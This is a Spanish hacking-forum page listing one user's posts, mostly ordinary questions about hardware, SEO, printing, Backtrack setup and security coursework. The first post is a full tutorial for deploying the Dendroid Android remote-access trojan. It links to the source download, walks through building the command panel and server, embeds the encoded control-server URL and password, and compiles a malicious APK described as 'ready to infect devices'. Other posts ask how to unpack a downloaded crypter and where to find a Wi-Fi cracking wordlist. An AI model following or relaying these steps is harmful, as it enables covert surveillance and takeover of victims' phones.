Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - OLM

#1


Os traigo un tutorial para que aprendáis a configurar el RAT para Android llamado Dendroid.
Descarga: http://malwares.underc0de.org/?dir=Troyanos/Otros/DenDroid.zip

REQUISITOS ANTES DE EMPEZAR

Disponer de un Servidor Web con PHP y MySQL
phpmyadmin
OpenJDK JRE x64
Java JDK


CREAR EL PANEL DE ADMINISTRACIÓN

Yo he creado un subdominio en esta web para realizar el tutorial, llamado dendroid.hackpuntes.com



Este subdominio redirige a una carpeta que he montado en public_html/dendroid, lugar en el cual subiremos nuestros archivos.



La primera parte del tutorial la dedicaré a mostraros como crear el panel de administración de nuestro DENDROID, desde él podremos controlar todos los dispositivos que tengamos infectados.

Si descomprimimos nuestro archivo .rar con el código fuente de DENDROID, nos encontraremos con 3 carpetas y un archivo, podemos echar un vistazo antes de empezar a montar el panel al archivo readme.md, en él nos explica como realizar todo el proceso, eso sí, en inglés.



En la carpeta Dendroid Panel, podemos ver los siguientes archivos:



Otra vez mas tenemos un readme, esta vez mas especifico para ayudarnos a montar el panel en el servidor web, primero nos centramos en la carpeta Panel, que tienes estos archivos.



Tenemos que editar con algún editor de texto, los siguientes archivos:

applysettings.php
blockbot.php
clearawaiting.php
clearmessages.php
deletebot.php
deletefile.php
deletepics.php
functions.php
table.php


y cambiar el valor de la variable $url que por defecto es "http://pizzachip.com/rat/" al nombre de nuestro dominio donde almacenaremos el panel de control, en mi caso "http://dendroid.hackpuntes.com", de esta manera.

Antes


Después


Este paso lo tendremos que realizar en todos los archivos que anteriormente he descrito y asegurarnos que todos los archivos empiezan por <?php.

Ademas en el archivo reg.php cambiaremos el valor de $allowebDomains respetando las www.

Antes


Después


Ahora toca modificar los siguientes archivos para poner una contraseña:

get.php
get-functions.php
new-upload.php
upload-pictures.php


Buscamos el valor "keylimepie" y lo sustituimos por nuestra contraseña:

Antes


Después


Es hora de pasar al servidor web, necesitamos crear una base de datos, con un usuario con todos los privilegios, debemos de recordar nombre de la base de datos, usuario, etc porque nos hará falta después.

Es posible que dependiendo del servidor que utilicéis los siguientes pasos pueden cambiar, mi servidor web utiliza CPanel, en caso de que el vuestro sea distinto y no sepáis como crear una base de datos con usuario con privilegios, poneos en contacto con la ayuda de vuestro hosting.

Creando base de datos.


Añadiendo un usuario a la base de datos.


Asignándole todos los privilegios.


Buenos ya tenemos la base de datos y el usuario, ahora debemos de crear las tablas dentro de la base de datos, para crearlas haremos lo siguiente, dentro de la carpeta "Other Files" tenemos un archivo que se llama SQL.sql, lo abrimos con el editor y copiamos todo lo que contenga.







Ahora necesitamos ir a phpmyadmin, y en la base de datos que creamos anteriormente, tenenos una pestaña que dice SQL, pegamos el código anterior y lo ejecutamos.



El resultado será las siguientes tablas creadas.



Es hora de subir todos los archivos que modificamos anteriormente por FTP al servidor, podemos utilizar un programa como Filezilla para ello, simplemente arrastramos los archivos a la carpeta public_html/dendroid nos quedaría así:



Nos dirigimos a la dirección de nuestro servidor donde tenemos almacenadas las carpetas, en mi caso como os comente anteriormente cree un subdominio.

Por lo tanto accedemos a dendroid.hackpuntes.com donde nos aparecerá la pantalla de configuración del panel, como esta:





En ella nos dice que es la primera vez que accedemos, que tenemos que crear una cuenta para el login, poner el nombre de la base de datos, el usuario de dicha base y también nos indica que está optimizado para funcionar en Google Chrome, pero yo lo he probado sobre Mozilla Firefox y sin problemas.

Si hacemos Click en Begin Setup, nos encontraremos con la que es posiblemente el paso mas importante a la hora de crear el panel de administración, la configuración de este.

Podéis dejarlo como veis en la imagen, es lo que trae por defecto y añadir en los campos correspondientes los datos que nos pide, menos mal que aún nos acordamos del nombre que pusimos a la base de datos, el usuario y la contraseña :).

En la parte derecha, podéis ver con fondo amarillo el campo Username y Password, este será el login para poder acceder al panel de control, nada que ver con el user y pass que creamos para la base de datos, además, es recomendable que no utilicemos las mismas contraseñas.



Una vez rellenos los campos, Click en el boton Continue.



Y nos dirá que todo está completo, Click en Finish Setup y nos aparecerá el login, podremos el User y Pass que pusimos en los campos amarillos del paso de configuración.



Y finalmente, ya estamos dentro de nuestro panel de administración, totalmente configurado y listo para crear el troyano y administrar los dispositivos desde él.



COMPILANDO LA APK MALICIOSA

Para esta parte del tutorial, necesitaremos tener instalado Eclipse + SDK de Android y tener instalado en el sistema el JDK, si tenéis cualquier tipo de problema en instalarlo, podéis buscar en Google, existen miles de tutoriales de como preparar Eclipse para el desarrollo de aplicaciones Android.

Una vez tenemos todo instalado en el sistema, abrimos nuestro Eclipse y deberemos importar el proyecto, nos vamos a File –> Import.



El proyecto que tenemos que importar, está dentro de la carpeta Dendroid APK, recordemos que ya hemos utilizado la carpeta Dendroid Panel y nos faltaría por utilizar una última carpeta llamada APKBinder, que es la necesaria para "camuflar" nuestra APK Maliciosa.



Una vez hacemos Click en Import, debemos de indicarle a Eclipse que es un proyecto ya existente, en la categoría Android.



En Root Directory buscamos la ruta de la carpeta Dendroid APK.



Debemos de asegurarnos que la casilla Copy projects into workspace está marcada, de lo contrario la carpeta Dendroid APK desaparecerá y no la podremos volver a utilizar.



Click en Finish y nos aparecerá en la parte izquierda de nuestro Eclipse el proyecto de Dendroid APK, listo para modificar y compilar.



Es de buena práctica, renombrar los proyectos, yo lo llamaré DendroidAPK.





Vamos a modificar del proyecto solamente el valor de 3 variables, estas variables se encuentran en la clase DroidianService.java, dentro del paquete com.connect y en la carpeta src.

Se llaman encodedURL, backupURL y encodedPassword, si nos fijamos bien, veremos que su valor está codificado en Base64.



El valor de estas variables deberemos de borrarlo, y los dejamos vacíos, como en la siguiente imagen.



¿Y que debemos de poner si los hemos dejado vacíos? Lo primero será visitar la siguiente pagina web, CRYPO es una herramienta online para cifrar y descifrar en multitud de sistemas de numeración, nosotros la que utilizaremos será BASE64, y deberemos de poner la dirección en la cual quedo instalado nuestro panel de control, recordad que la mía era http://dendroid.hackpuntes.com/



Una vez lo tenemos puesto, hacemos Click en el boton encrypt y nos aparecerá algo parecido a esto:



Ese String, es que tendremos que poner como valor a las variables encodedURL y backupURL.

Para la variable encodedPassword repetiremos el mismo paso, pero esta vez deberemos de cifrar la contraseña que pusimos a la hora de crear nuestro panel de control (aquella que cambiamos el valor de keylimepie).

Nos quedaría así (evidentemente con la contraseña agregada)



Ya tenemos el proyecto modificado, ahora deberemos de compilarlo y generar el APK, nos vamos a la pestaña File –> Export.



Y le indicamos que queremos una Aplicación Android (APK).



Hacemos Click en Next y en la siguiente ventana buscamos nuestro proyecto.



La primera vez, nos pedirá una clave, si ya la tenemos marcamos la opción de Use existing keystore, en caso contrario la crearemos, debemos de indicar la ubicación en la cual se guardara la llave y ponemos un contraseña (otra distinta de las utilizadas hasta ahora).



Rellenamos los campos.



Y por ultimo nos pedirá que marquemos la ruta en la cual se generará el APK.



Click en Finish y ya tenemos nuestra APK maliciosa, lista para infectar a dispositivos.


Fuente: http://hackpuntes.com
Autor: Javier Olmedo
PD: Cuanto pueda modifico el tema y subo la última parte, en la cual se bindea junto a otra APK legitima de Google Play.
#2
Hardware / ¿Por cuando venderiais este PC?
3 Enero 2014, 19:26 PM
Buenas tardes a todos.

Estoy pensando en vender el PC, porque se queda un poco corto para algunos juegos, y he decido comprármelo nuevo y montármelo para AMD.

El PC es el siguiente:

Caja ST Aercool VS-9 Negra S/F
Fuente Alimentacion 650W Coolbox PowerLine F-650
Procesador Intel I5 650 3.20 Ghz
PL Intel Core I7 Asus P7H
AM2/775/1366 Thermaltake IS
Kit de Memoria RAM 3x2GB DDR3 Corsair133
HD 500 GB 7.200 Seagate Maestro
REG LG DVD -R/+RW 24x
Tarjeta Gráfica Zotac GTX 465 PCX DDR5 1GB HDMI
Puertos USB 3.0 Remesas
Antena Wifi TP-Link 300Mbps.

Precio en €.

Un Saludo y gracias.
#3
Buenas a todos,

Estoy contratando un servicio de hosting, y a la hora de pagar se me ofrece la posibilidad de añadir una mejora en mi contratación hosting, se trata de Standard Search Engine Visibility, de Godaddy.

No se si alguno lo conocerá y si realmente merece la pena contratarlo, ya que subiré Wordpress con los plugins de SEO.

Un Saludo.
Gracias.
#4
Buenos días amigos,

Llevo tiempo ya con mi web y he decidido dar un cambio de aires, he visto una pagina web, que me gusta bastante y me gustaría modificar la mía lo mas parecida posible, esta web tiene muchas funcionalidades, de ahí que quiera sacar toda la información posible de todo.

Para webs desarrolladas en Wordpress puedes sacar con WPscan toda la información sobre la página: temas, plugins, fallos de seguridad, etc.

Me preguntaba como podría averiguar como esta desarrollada la webs, herramientas, hostings en cual esta ubicado (este es menos importante porque ya lo saqué, pero agradecería otras formas o herramientas para dar con ello, he utilizado la herramienta de Nirsoft) .

En definitiva "Escanear a fondo" la web (no busco contraseñas ni usuarios ni nada por el estilo, únicamente información sobre ella)

Un Saludo y muchas gracias.
#5
Buenas a todos,

Estoy intentando descargar un crypter, bueno en realidad ya lo he descargado, lo que ahora necesito es la contraseña para descomprimir el rar, he leido, y por lo visto hay que engañar al navegador para así poder realizar la descarga, es un modo de protección para que este tipo de archivos (para que no lo puedan descargar los noobs)

¿Como puedo burlarlo?

Un Saludo y agradeceria que me ayudaran, por favor mandar MP si no es posible contestar en el tema.

Gracias.

P.D Si este tema debe estar en hacking basico pido disculpas.

Aqui dejo el link: http://fileice.net/download.php?file=3kn5m
#6
Hardware / Monitor Gamer
1 Febrero 2013, 11:28 AM
Buenas a todos!!!

He abierto este tema para pedir consejo sobre un monitor "Gamer", es decir de alta resolución, diseño, pulgadas, etc.
No se si alguno de vosotros os habréis comprado uno hace poco o conocéis de alguno que realmente se note la diferencia entre lo bueno y lo excelente.

He visto este: Asus ML248H 24" LED

¿Que os parece?

Un Saludo.
#7
Buenos días a todos,

Reciente he contratado un hosting, y por separado he contratado un dominio.
Quería haceros una pregunta para ver si alguien puede indicarme.

En el hosting solo puedo agregar un dominio, y necesito crear 2 web independientes(una web de informacion y otra de tienda).

La web (menos importante) tendrá el dominio, es decir www.dominio.com, y la otra web (la mas importante) me gustaria que quedara de la siguiente manera www.tienda.dominio.com.

¿Al ser un subdominio creeis que los buscadores lo indexaran y tendrán en cuenta que es un subdominio a la hora del posicionamiento, alejándolo así de las primeras posiciones? (suponiendo que hemos hecho un buen posicionamiento)

Un Saludo a todos.
Gracias.

#8
Buenas a todos,

Os comento mi problemilla, que por mas vueltas que doy no consigo solucionar.

Tengo unos planos en pdf en tamaño A2 (420x594), me gustaría reducirlos a 350x500 para imprimirlos, pero no se como hacerlo, tengo Acrobat y he leído sobre el tema pero no doy con ello.

Un Saludo y muchas gracias.
#9
Buenas a todos,

Estoy realizando este tipo de mapas de situación.

http://imageshack.us/photo/my-images/547/ejemplomapasituacion.jpg/

Quería preguntaros si conocéis algún software especial (o que esté exclusivamente dedicado para realizar este tipo de mapas de situaciones), he creado uno con photoshop pero tardo demasiado tiempo.

¿ Algún software que me recomendéis?

Un Saludo.
Gracias.
#10
Buenas a todos,

He estado buscando por diversas paginas en busca de una pregunta que no he encontrado respuesta y es la siguiente:

¿Existe relación entre buen hosting y posicionamiento en buscadores?

Es decir, con un buen hosting (independientemente de pago o no) puedes garantizarte un mejor posicionamiento.

Un Saludo y gracias.
#11
Hola amigos!!!

Recientemente he creado unas tarjetas de visita en Photoshop, en tamaño 85mm x 50mm.
El problema es que al ser en 2 caras (2 diseños distintos) no se como imprimirlo (la impresora imprime por las 2 caras a la vez) pero no encuentro un software o la manera de hacer para que queden correctamente centradas la parte frontal y el anverso y queden marcadas las lineas de corte.

¿ Algún consejo que podáis darme?

Gracias.
#12
Diseño Gráfico / Imprimir logo en A4
30 Septiembre 2012, 16:50 PM
Hola amigos, me gustaría hacer una pregunta, que llevo tiempo intentando averiguar.
Tengo un archivo png con mi logo, el cual tiene unas dimensiones especificas 28,5 mm x 31,5 mm, necesito imprimir en una hoja A4 toda la cantidad posible que entre pero no se como hacerlo. ¿ Podríais ayudarme? Tengo Phososhop CS4.

P.D Lo he imprimido desde el visor de imágenes de Windows pero no me respeta las dimensiones.
Gracias
#13
Hola a todos,

Después de "luchar" con un problema de mi PC (no arranca ni enciende pero giran los ventiladores) y comprobar todos y cada unos de los componentes he llegado a la conclusión de que mi placa base esta jodida estropeada.

Ahora bien, llega el momento de comprar una nueva, como bien he puesto mi modelo es el GeForce 6100 M9, y el socket es el 939 (creo que no hay otro socket para esta placa, corregidme si me confundo). No creo que pueda encontrarla por ningún lado, así que creo que la mejor opción seria esta:

http://www.pccomponentes.com/asrock_939a785gmh.html

¿Que tendría que tener en cuenta a la hora de comprarla a parte de que los módulos de RAM sean compatibles?¿Otros problemas que pueda darme? Dimensiones, etc ......

Saludos!!!!
#14
Hola a todos!!!

Quería preguntaros si conocéis algún software para entornos Güindow$ que haga el escaneo y recorte automáticamente fotografías, el que vienen con la impresora (Canon) lo escanea y lo recorta pero únicamente una foto (los escaneos los estoy haciendo de 2 fotos mínimo).

Un saludo!!!

P.D Se me olvidaba deciros que he probado con Photoshop pero tardo demasiado :)
#15
Seguridad / Nmap "Torizado"
26 Junio 2012, 21:58 PM
Hola a todos, estoy intentando "torizar" Nmap a la red Tor, he utilizado el siguiente comando:
proxychains nmap -sT -PN -n -sV -p80 192.168.1.41

pero me aparece el siguiente error
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.00 ( http://nmap.org ) at 2012-06-26 21:53 CEST
|S-chain|-<>-127.0.0.1:9050-<--timeout
Nmap scan report for 192.168.1.41
Host is up (0.00026s latency).
PORT   STATE  SERVICE VERSION
80/tcp closed http

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds


¿Como puedo averiguar si realmente Nmap lo tengo listo para trabajar con la red Tor? ¿Y para utilizarlo con la interfaz gráfica?

Saludos!!!!
#16
Hola a todos, he decidido crear este tema para orientarme en cuanto a mi futuro, acabo de terminar mi grado medio en sistemas microinformáticos y explotación de redes, y ahora me surge una gran duda, ¿Que puedo seguir estudiando?

He decidido estudiar un grado superior, pero no se cual de los 3 que oferta la comunidad de Castilla la Mancha, me gustaría si alguien los ha hecho que me aconsejara.

A continuación pongo los 3 módulos disponibles.

Grado Superior Sistemas de Telecomunicación e Informáticos.

http://www.ies-azarquiel.es/index.php?option=com_content&view=article&id=58&B&titulo=Grado%20Superior%20Sistemas%20de%20Telecomunicaci%C3%B3n%20e%20Inform%C3%A1ticos&ruta=gradosuper/STI.pdf&Itemid=181

Grado Superior Administración de Sistemas Informáticos en Red. (ASIR)

http://www.ies-azarquiel.es/index.php?option=com_content&view=article&id=58&B&titulo=Grado%20Superior%20Administraci%C3%B3n20de%20Sistemas%20Inform%C3%A1ticos%20en%20Red&ruta=gradosuper/ASIR.pdf&Itemid=183

Grado Superior Desarrollo de Aplicaciones Multiplataforma

http://www.ies-azarquiel.es/index.php?option=com_content&view=article&id=58&B&titulo=Grado%20Superior%20Desarrollo%20de%20Aplicaciones%20Multiplataforma&ruta=gradosuper/DAM.pdf&Itemid=184

Un Saludo a todos y espero vuestros consejos.
#17
Buenas a todos,

El motivo de abrir este tema es el siguiente, trabajo para una importante empresa que se dedica mayormente a la venta de portátiles y Ultrabook, el pasado viernes nos visitaron unos comerciales de Intel y nos propusieron hacer unas pruebas de rendimiento a los distintos portátiles y Ultrabooks que tenemos (con procesadores tanto de Intel como AMD) para que nos diéramos cuenta de lo muy potente que son sus procesadores respecto a los de la competencia, nos quedamos todos muy asombrados tras realizar los test, de hecho se oye en la empresa que el software utilizado para realizar los test (Cinebench) está amañado por Intel para ofrecer unos mejores resultados frente a los test de AMD, y por eso he creado este tema para saber si alguien sabe si es correcto o no, que este software favorece a los procesadores Intel a la hora de realizar los test.

Un saludo y gracias.
#18
Seguridad / Navegación segura.
16 Mayo 2012, 20:21 PM
Hola a todos, he creado este tema para encontrar software libre para crear VPN, tipo proXPN o TOR. ¿Cual utilizáis vosotros?¿recomendaciones?

Un Saludo y gracias
#19
Hola a todos, estoy buscando un diccionario para redes WLAN_XXXX, hace tiempo lo tenia y lo borre porque creia que ya no me haria falta, y ahora estoy buscando y buscando pero no lo encuentro, solo necesito el archivo txt, lo necesito para hacer unas pruebas una vez capturado el handshake.

Un Saludo.

P.D Seguro que os dan ganas de darme una colleja pero por mas que busco no lo encuentro.
#20
Hola a todos, necesito crear una maquina virtual de Windows XP con vulnerabilidades (unas cuantas mas aparte de las que ya tiene), para realizar pruebas de intrusión en clase, ya hemos probado con metasploitable, pero necesitamos algo en entorno Windows.

¿Que podría añadir a XP SP1 para que fuera mas vulnerable? ¿Instalar un servidor web?

He leido algo sobre DVWA (Damn Vulnerable Web Application) pero no se realmente en que consiste.

Un Saludo.
#21

Hola a toda la comunidad elhacker.net!!!!

Desde hace un par de semanas estoy viendo una creación masiva de temas relacionados con Backtrack 5, y he pensado en crear uno donde se comente sobre todos los errores más frecuentes, dudas sobre herramientas que incluye la distribución, consejos, configuraciones y todo lo relacionado con esta magnífica distribución.

A continuación se exponen los problemas que tuve y la solución que le di, con el tiempo iré añadiendo mas (agradecería si ustedes pusieran los suyos y posibles soluciones).

1) Conectarse a Internet con Wicd Network Manager.

Si nos aparece el siguiente error:
"Could not connect to wicd's d-bus interface. check the wicd log for error messages"

Ponemos en la Terminal:
dpkg-reconfigure wicd & update-rc.d wicd defaults

2) Actualizar los repositorios.

Ponemos en la Terminal:
apt-get install update

3) Actualizar los paquetes.

Ponemos en la Terminal:
apt-get install upgrade

4) Traducir a Español.

Ponemos en la Terminal:
apt-get install language-selector

Después nos vamos al gestor de idiomas y ponemos el Español.

Si nos aparece el siguiente error:
"Could not apply changes fix broken packages first"

Nos vamos a Sypnactic | Pestaña "Edit" | y después buscamos los paquetes rotos y los restauramos.

5) Instalar Google Crome

Lo descargamos desde la web y después vamos a la carpeta donde se ha realizado la descarga.

Ponemos en la Terminal:
cd (ruta carpeta de descarga)

y desempaquetamos con Dpkg

Ponemos en la Terminal:
dpkg -i (nombre paquete)

Si nos aparece el siguiente error:
No se puede ejecutar google chrome como raiz

Creamos un acceso directo (lanzador)
Botón derecho | Propiedades
y en comando debe quedar de esta manera:
/opt/google/chrome/google-chrome %U[ESPACIO]--user-data-dir

6) Configurar la tarjeta de red.

Hacemos una copia del archivo "interfaces"

Ponemos en la Terminal:
cp /etc/network/interfaces /etc/network/interfaces.old

Despues:
Ponemos en la Terminal:
gedit /etc/network/interfaces

El archivo deberá quedar de la siguiente manera (Es la interfaz eth0 no wlan0) con la configuración correspondiente a nuestra red:

#Interfaz eth0
auto eth0
iface eth0 inet static
address 172.16.4.111
gateway 172.16.0.1
netmask 255.255.0.0
network 172.16.4.0/24
broadcast 172.16.0.255


7) Sonido

Es un error muy común y muy molesto pero de fácil solución, a veces nos aparece un mensaje al acceder al menú del sonido
"Esperando a que el sistema responda" o algo parecido.
Para solucionarlo es tan simple como irnos a

Sistema | Preferencias | Aplicaciones al inicio

Hacemos "Click" y le damos a añadir, en Nombre ponemos Volumen, en Comando ponemos "/usr/bin/pulseaudio" sin las comillas por supuesto y en Descripción ponemos Control del volumen, después le damos a añadir o guardar y listo reiniciamos el ordenador y ya tendremos sonido.

8) Configuración Nessus

Primero y antes de nada deberemos de registrarnos para obtener una clave para su utilizacion, una vez obtenido el codigo.

Ponemos en la terminal
/opt/nessus/bin/nessus-fetch --register (aquí el código de activación)

Ahora ya tenemos activado nessus, el siguiente paso es crear un usuario:

Ponemos en la terminal
/opt/nessus/sbin/nessus-adduser (Aquí nuestro usuario)

Una vez que ya tengamos esto hecho, para entrar escribimos en el navegador:

https://127.0.0.1:8834/

9) Instalar gestor de actualizaciones.

Ponemos en la Terminal:
apt-get install update-manager
#22
Ser rico y tener muchos amigos no es tan difícil. En este sentido, las redes sociales no han inventado nada. Es más, lo han llevado al extremo. ¿Quiere hacerse popular en la red de la noche a la mañana y contar sus seguidores por miles? Si tiene dinero no se esfuerce: cómprelos.

La reputación de empresas o incluso de internautas particulares se mide en Facebook o Twitter por el número de seguidores, y número que puede tener un valor en el mercado de la publicidad, por ejemplo, o en el laboral, a la hora de realizar una entrevista de trabajo.

Y por eso mismo hay empresas que venden seguidores. ¿A cuánto? Pues depende del número pero puede decirse que no muy caros: a unos 300 euros los 5.000, es decir a 0,6 euros la unidad. Se trata de un mercado competido dado lo fácil que es encontrar la oferta.

Basta teclear en Google "comprar Facebook fans" para que incluso en la publicidad de cabecera del buscador salte una oferta de 1.000 seguidores a 59 dólares. Pero se puede negociar porque, como en cualquier mercado, el precio del seguidor baja cuando la compra es en grandes cantidades: 10.000, 20.000, 30.000, 100.000...

En todas las redes

La australiana uSocial, la número uno del mundo, ofrece desde hace años paquetes de seguidores que actualmente llegan hasta 20 millones. Sus servicios se extienden a Twitter, Youtube, Tumblr...

"Tenemos una gran red de sitios web de juegos, compras y entretenimiento, donde se ofrecen contenidos gratuitos que incluyen videos, imágenes, juegos y cupones de compras", explica una de estas empresas, con el explícito nombre de comprarfacebookfans.com.

Según explica, a cambio del acceso a este contenido libre, los usuarios dan permiso para que sus perfiles se traten con fines comerciales. "Este proceso asegura que los fans han sido captados de manera voluntaria y totalmente real. Nuestro objetivo es proporcionar a la gente real, para el éxito de marketing de Facebook", afirma para subrayar la calidad de su producto.

Otra empresa de estrategias digitales, 101, duda de esto último. "No parecen personas reales, su identidad no está contrastada y las imágenes pueden haber sido captadas de cualquier forma", dice Carlos García Hoz, director creativo de la agencia.

Una prueba

Como comprobación, esta empresa compró 5.000 fans por 300 euros para una marca inventada. Al día siguiente, toda una muchedumbre abarrotaba la lista de seguidores de la marca ficticia. Unos eran alemanes, otros brasileños, los había de Marruecos y México, y también había alguno español...

Al margen del detalle de que la marca española no tenía presencia en Alemania pero más de la mitad de sus nuevos seguidores eran alemanes, también se daba el caso de que todos los seguidores de su lista internacional elegían el inglés para presentarse en sus perfiles.

Con el tiempo, en su comportamiento tampoco parecen usuarios muy normales. ¿Aparte de apuntarse en masa a quien pague dinero, dicen algo? "Absolutamente nada", afirma el comprador.

"Son zombis. No hay ni un solo comentario, lo que, con las nuevas estadísticas de Facebook que resaltan el número de personas hablando de un tema les deja en evidencia por su silencio", comenta. "En nuestro caso, de los 5.000 comprados solo hablan dos".

Fuente: http://www.elmundo.es/elmundo/2012/03/19/navegante/1332174792.html
#23
Redes / Manual y presentación Wireshark
10 Marzo 2012, 12:59 PM
Hola a todos, me complace compartir con todos ustedes mi presentación sobre la herramienta Wireshark.
Dentro del .rar hay 2 archivos, uno es la presentación y otro un breve manual de Wireshark.

LINK ------- >>> http://www.mediafire.com/?h14zofgtdk353hd
CONTRASEÑA >> smr212CFGM2

Muchas gracias a todos los que me dieron consejos.
#24
GNU/Linux / Backtrack R2 ¿32bits o 64 bits?
10 Marzo 2012, 10:11 AM
Hola a todos!!!

Actualmente el sistema operativo que tengo en mi maquina es Backtrack 5 32bits, voy a formatear el ordenador y posteriormente instalaré Windows y Backtrack de manera conjunta, pero no se si cambiar a 64 bits ni los problemas que pudiera tener, siempre he trabajado con arquitectura de 32 bits en distribuciones Linux y me han ido todas genial. Quería preguntaros si alguien tiene instalado Backtrack 5 64 bits y si tiene demasiados problemas.

Un Saludo a todos.
#25
Una vez mas, tengo una duda, esta vez sobre las redes de topología en malla.

Mi duda es la siguiente:

Dispongo de 5 portátiles, y mi finalidad es crear una red en malla inalambrica.



¿Es obligatorio crear una conexión punto a punto con todos y cada uno de los PC´s?¿Como puedo crearla?

Un Saludo a todos!!!!
#26
Redes / Presentacion Wireshark !!!!! Consejos
3 Febrero 2012, 12:34 PM
Hola a todos.

Queria pediros ayuda, mas que ayuda consejos en general.
Soy estudiante de informática, y en 2 meses deberé de exponer un trabajo sobre Wireshark.
El problema viene cuando no tengo pensado como plantear el tiempo en mi exposición (2 horas) ni que contenido explicar, he pensado empezar la presentación explicando como instalar Wireshark en Linux y Windows (no haré demasiado hincapié), y después explicar un poco el modelo OSI y TCP como introducción a Wireshark y seguir explicando el filtrado de paquetes.
Agradecería si pudierais pasarme apuntes en caso de que alguien haya trabajado con Wireshark o toda la documentación posible será poca.
No quiero que mi presentación sea aburrida y pesada, por lo que he pensado plantear unos ejercicios básicos para que mis compañeros trabajen con el y no sea monótona la presentación ¿ Algún consejo o recomendación?

Gracias, Un Saludo.
#27
Hola a todos, he creado este tema porque ayer en clase el Avast me avisó de un posible ataque a mi maquina, os explico:

En clase de seguridad, tuvimos una practica sobre escaneo de puertos, mientras escaneaba a uno de mis compañeros el Avast me avisó de un posible ataque con un exploit hacia mi sistema.

DCOM Exploit "IP:135"

He estado investigando y este aviso puede ser debido al escaneo que yo mismo hice sobre otra maquina, es decir, que no existe ningún ataque contra mi maquina sino que el aviso es por el escaneo realizado por mi.

¿Como puedo averiguar si el aviso es por el escaneo o si, en caso contrario es un ataque de un compañero?
#28
GNU/Linux / ¿Dónde se instalan las aplicaciones?
16 Diciembre 2011, 01:55 AM
Hola a todos, después de luchar he conseguido añadir los repositorios de Backtrack 5 a el archivo souces.list de mi Ubuntu (digo luchar porque estoy empezando a utilizar Linux y estoy muy verde por lo que me cuesta mucho entenderlo  :) ), actualizo el gestor de paquetes y procedo a instalar las aplicaciones junto con sus paquetes necesarios, he instalado Gerix, Ettercap, Aircrack y Macchanger.
El problema viene cuando una vez instalado no se como ejecutarlos, solo he logrado ejecutar Gerix con permisos gracias a un articulo que he leido, ¿Cómo puedo averiguar la ruta donde se instalan las aplicaciones para posteriormente crear un lanzador en el escritorio con permisos?
#29
Hola Amigos, quería compartir con ustedes los vídeos que actualmente estamos trabajando con ellos en clase, se trata de 11 vídeos donde conoceremos los aspectos mas básicos de la Criptografía y su historia.Estos videos son ofrecidos gracias a Intypedia, que desde aqui les agradezco por su trabajo.

Link de descarga: http://www.megaupload.com/?d=MRF2TRE6
Pass: "smr212CFGM2"

Un Saludo a todos!!!!
#30
Hacking / Apuntes de Seguridad Informática
6 Octubre 2011, 00:47 AM
Hola a todos!!!! Hoy hemos terminado el primer tema en el ciclo sobre seguridad informatica que estoy realizando, he pensado que quizas estos apuntes y videos que he visto en clase pueda servir a alguien (es lo mas básico que podamos encontrar sobre el hacking) y he decidido compartirlo con ustedes.Los videos son de varios autores que desconozco y que los felicito por su trabajo, con ello quiero dejar claro que no pretendo manipular nada de nadie, simplemente compartir.Ire subiendo los apuntes que tome durante todo el curso.


Tema 1 Conceptos Básicos de la seguridad informática

http://www.mediafire.com/?6130kwfmby3nxd4

Tema 2 Seguridad Pasiva, Hardware y almacenamiento

http://www.mediafire.com/?k1h84cgwnvo6jg5

Tema 3 Seguridad Pasiva, Recuperación de datos

http://www.mediafire.com/?8aewd6fq14wh821

Tema 4 Sistemas de identificación, Criptografía.

http://www.mediafire.com/?uegqt53aza5y33y

Tema 5 Técnicas de hacking contra los sistemas y contramedidas.

http://www.mediafire.com/?1mfa77al7zvdb4p

Tema 6 Hacking en redes WiFi

Aun no completado los apuntes

Debido a un incumplimiento con las normas del foro, se me ha informado que debo de poner la contraseña para que la información almacenada no sea nula, es la siguiente "smr212CFGM2" sin las comillas, si hay algún problema con cualquier enlace por favor decírmelo e intentare solucionar el problema cuanto antes.

Un Saludo a todos!!!
#31
Hacking / Libro Hacking y seguridad Básico
4 Octubre 2011, 21:16 PM
Hola a todos, soy estudiante de un ciclo de grado medio de sistemas microinformáticos y explotación de redes, este es mi segundo año y tenemos una asignatura de hacking y seguridad informatica, como podeis ver soy nuevo (no me trateis con mucha crueldad) y he decidido apoyarme en este foro tan interesante para poder aprender y desarrollar lo maximo posible mis habilidades durante el curso, queria preguntaros si conoceis algun libro, al poder ser lo mas actualizado posible, en el que pudiera aprender lo basico sobre el hacking y la seguridad informatica, mi profesor ya me ha hablado de 2 libros que estan muy bien, uno es "Destripar la red" y el otro "hacking y seguridad en internet".
Despues de mirarmelos por encima he llegado a la conclusion de que por ahi no puedo empezar, necesito algo aun mas basico.
Estaria muy agradecido si alguien pudiera aconsejarme.
Muchas Gracias